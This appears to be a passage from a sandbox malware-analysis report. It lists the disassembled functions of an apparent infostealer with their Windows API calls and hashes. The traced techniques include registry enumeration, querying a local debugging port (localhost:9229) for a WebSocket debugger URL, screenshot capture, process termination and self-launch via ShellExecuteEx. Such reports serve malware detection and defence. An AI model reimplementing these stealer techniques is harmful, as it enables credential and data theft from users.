                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 00e46ba033bbf3e5dbc6653125ed67e579b26cc9d96f802874372e13cd5bbf3f
                                  • Instruction ID: 842bc0a0f1b849a6110f3d7bad4a5392641f3e387b9aebddf784a2c40909f484
                                  • Opcode Fuzzy Hash: 00e46ba033bbf3e5dbc6653125ed67e579b26cc9d96f802874372e13cd5bbf3f
                                  • Instruction Fuzzy Hash: E9026370A02205CFCB26DF59D9A8B6AF7B5AF50704F1980A9E4059B3E1DB71DC46DF80
                                  Function 00323760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • RegOpenKeyExA.ADVAPI32(?,0102AF50,00000000,00020019,?), ref: 003237BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003237F7
                                  • wsprintfA.USER32 ref: 00323822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00323840
                                  • RegCloseKey.ADVAPI32(?), ref: 0032384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00323858
                                  • RegQueryValueExA.ADVAPI32(?,0102DC10,00000000,000F003F,?,?), ref: 003238A1
                                  • lstrlen.KERNEL32(?), ref: 003238B6
                                  • RegQueryValueExA.ADVAPI32(?,0102DE68,00000000,000F003F,?,00000400), ref: 00323927
                                  • RegCloseKey.ADVAPI32(?), ref: 00323972
                                  • RegCloseKey.ADVAPI32(?), ref: 00323989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: 6c045f9686f3aee3a1ccf737e0b3d4d2e6398469126693db7ae3c417420df454
                                  • Instruction ID: 3e01c001248fd937ab5581649787b9cf024b95923141dbdf8ae0372e2ecdba95
                                  • Opcode Fuzzy Hash: 6c045f9686f3aee3a1ccf737e0b3d4d2e6398469126693db7ae3c417420df454
                                  • Instruction Fuzzy Hash: 2E91ADB2900218DFCB11DF94ED84AEEB7B9FB48310F158569F509AB211DB31AE45CF90
                                  Function 003090C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 003090DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003090FC
                                  • InternetCloseHandle.WININET(00000000), ref: 00309109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00309166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00309197
                                  • InternetCloseHandle.WININET(00000000), ref: 003091A2
                                  • InternetCloseHandle.WININET(00000000), ref: 003091A9
                                  • strlen.MSVCRT ref: 003091BA
                                  • strlen.MSVCRT ref: 003091ED
                                  • strlen.MSVCRT ref: 0030922E
                                  • strlen.MSVCRT ref: 0030924C
                                    • Part of subcall function 00308980: std::_Xinvalid_argument.LIBCPMT ref: 00308996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: e2f28385d75d5ddfe177599ddfb1ba998a03333748794701a72e03d0a6340cc6
                                  • Instruction ID: 05b9b4b2fc6272e0b71e5fa7aa3880e2a3e47f4a8e8b5dde923e5e593fcc6e40
                                  • Opcode Fuzzy Hash: e2f28385d75d5ddfe177599ddfb1ba998a03333748794701a72e03d0a6340cc6
                                  • Instruction Fuzzy Hash: 8A51E471710209ABDB26DBA8DC85FEEF7F9DB48710F140469F504E7281DBB4AA4887A1
                                  Function 00321660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003216A1
                                  • lstrcpy.KERNEL32(00000000,0101B310), ref: 003216CC
                                  • lstrlen.KERNEL32(?), ref: 003216D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003216F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00321704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032172A
                                  • lstrlen.KERNEL32(01029EA8), ref: 0032173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321762
                                  • lstrcat.KERNEL32(00000000,01029EA8), ref: 0032176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321792
                                  • ShellExecuteEx.SHELL32(?), ref: 003217CD
                                  • ExitProcess.KERNEL32 ref: 00321803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: a3f00bac08a35be7bb98b7ad158cb62bf87f6df23991f29e6fb1bb5648aba32c
                                  • Instruction ID: 98638daca4ee2dc2fdaa96590647a63acd783f17a3ef79a254cefea0b4d2258e
                                  • Opcode Fuzzy Hash: a3f00bac08a35be7bb98b7ad158cb62bf87f6df23991f29e6fb1bb5648aba32c
                                  • Instruction Fuzzy Hash: 8C518571E012299BDB12DFA8DD88A9EB7F9AFA4300F054125F505E7351DF70AE05DB50
                                  Function 0031EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0031F026
                                  • lstrlen.KERNEL32(00000000), ref: 0031F035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 0031F053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 0031F081
                                  • lstrlen.KERNEL32(?), ref: 0031F094
                                  • lstrlen.KERNEL32(00000000), ref: 0031F0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0031F0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0031F13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: 97d76eacc7c4591a3254e8fb63c9c2c0ab176be941bf6c7edbd49a3c9f1313bd
                                  • Instruction ID: 4e94b0ed9d304a8e151512a6eb633cfa13bd7c51d7e43ecd854301894a0fe059
                                  • Opcode Fuzzy Hash: 97d76eacc7c4591a3254e8fb63c9c2c0ab176be941bf6c7edbd49a3c9f1313bd
                                  • Instruction Fuzzy Hash: 0F517D31A112059FCB27EF78DC99AAF77A5AF58300F064168F84A9F252DF30EC558B90
                                  Function 0030A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(01028A20,00539BD8,0000FFFF), ref: 0030A026
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030A053
                                  • lstrlen.KERNEL32(00539BD8), ref: 0030A060
                                  • lstrcpy.KERNEL32(00000000,00539BD8), ref: 0030A08A
                                  • lstrlen.KERNEL32(00334C4C), ref: 0030A095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030A0B2
                                  • lstrcat.KERNEL32(00000000,00334C4C), ref: 0030A0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030A0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030A0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030A114
                                  • SetEnvironmentVariableA.KERNEL32(01028A20,00000000), ref: 0030A12F
                                  • LoadLibraryA.KERNEL32(0102D2E8), ref: 0030A143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: 6cadfd5ca9792f13f96929766b1482b0d7efc3b976a3156729a9c34962b9177f
                                  • Instruction ID: 7f262bf8398d21acfa395b4e3dc0efd8e1fd3cd74cdf48533646278ec7b243ac
                                  • Opcode Fuzzy Hash: 6cadfd5ca9792f13f96929766b1482b0d7efc3b976a3156729a9c34962b9177f
                                  • Instruction Fuzzy Hash: 5D91C370A02F009FD7379FA8EC68A6637A9AB64705F410468F4058B3E1EFB5DD44DB82
                                  Function 0031C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031C8A2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031C8D1
                                  • lstrlen.KERNEL32(00000000), ref: 0031C8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031C932
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 0031C943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: cf700032acffa1bc6c7e8d6e3c708214887524a492145fbbf39f6f14a2c34d59
                                  • Instruction ID: d8e5b4f9cd0e353b257c6204695a4ec7335ea9d9787d9b58c923872307bd157e
                                  • Opcode Fuzzy Hash: cf700032acffa1bc6c7e8d6e3c708214887524a492145fbbf39f6f14a2c34d59
                                  • Instruction Fuzzy Hash: 8261B171E612199BCB17EFB4C888AEE7BB8AF19700F052069E841EB241DB749D458BD0
                                  Function 00324500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0032451A
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00314F39), ref: 00324545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032454C
                                  • wsprintfW.USER32 ref: 0032455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003245CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003245D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 003245E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID: 9O1$%hs$9O1
                                  • API String ID: 3729781310-210176786
                                  • Opcode ID: 404d49ec314c2c56212ab779533651963609c530e51fc62bb988d444af05ff79
                                  • Instruction ID: b196c42955808a3628deb6590914a2b1c471de0066aee4b7def983081d23dbce
                                  • Opcode Fuzzy Hash: 404d49ec314c2c56212ab779533651963609c530e51fc62bb988d444af05ff79
                                  • Instruction Fuzzy Hash: CE318F72A00215BBDB15DBE4EC89FEEB778BF55700F104055FA05E7280DBB0AA458BA5
                                  Function 003241E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00320CF0), ref: 00324276
                                  • GetDesktopWindow.USER32 ref: 00324280
                                  • GetWindowRect.USER32(00000000,?), ref: 0032428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 003242BF
                                  • GetHGlobalFromStream.COMBASE(00320CF0,?), ref: 00324336
                                  • GlobalLock.KERNEL32(?), ref: 00324340
                                  • GlobalSize.KERNEL32(?), ref: 0032434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: 091725a0e225b463f074772e303733685bbb84903d8fe7497d3d18f46ddde6c6
                                  • Instruction ID: 92ae89e533e91bbe8aacdf5424f1e02f94010e97512f7536f1478b5b80e4118d
                                  • Opcode Fuzzy Hash: 091725a0e225b463f074772e303733685bbb84903d8fe7497d3d18f46ddde6c6
                                  • Instruction Fuzzy Hash: 84513EB5A10208AFDB15DFA4ED89AEEB7B9EF58300F104419F905E7350DB74AD09DBA0
                                  Function 0031DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0102DF10), ref: 0031E00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031E037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0031E098
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0AC
                                  • lstrcat.KERNEL32(?,0101B0E0), ref: 0031E0C0
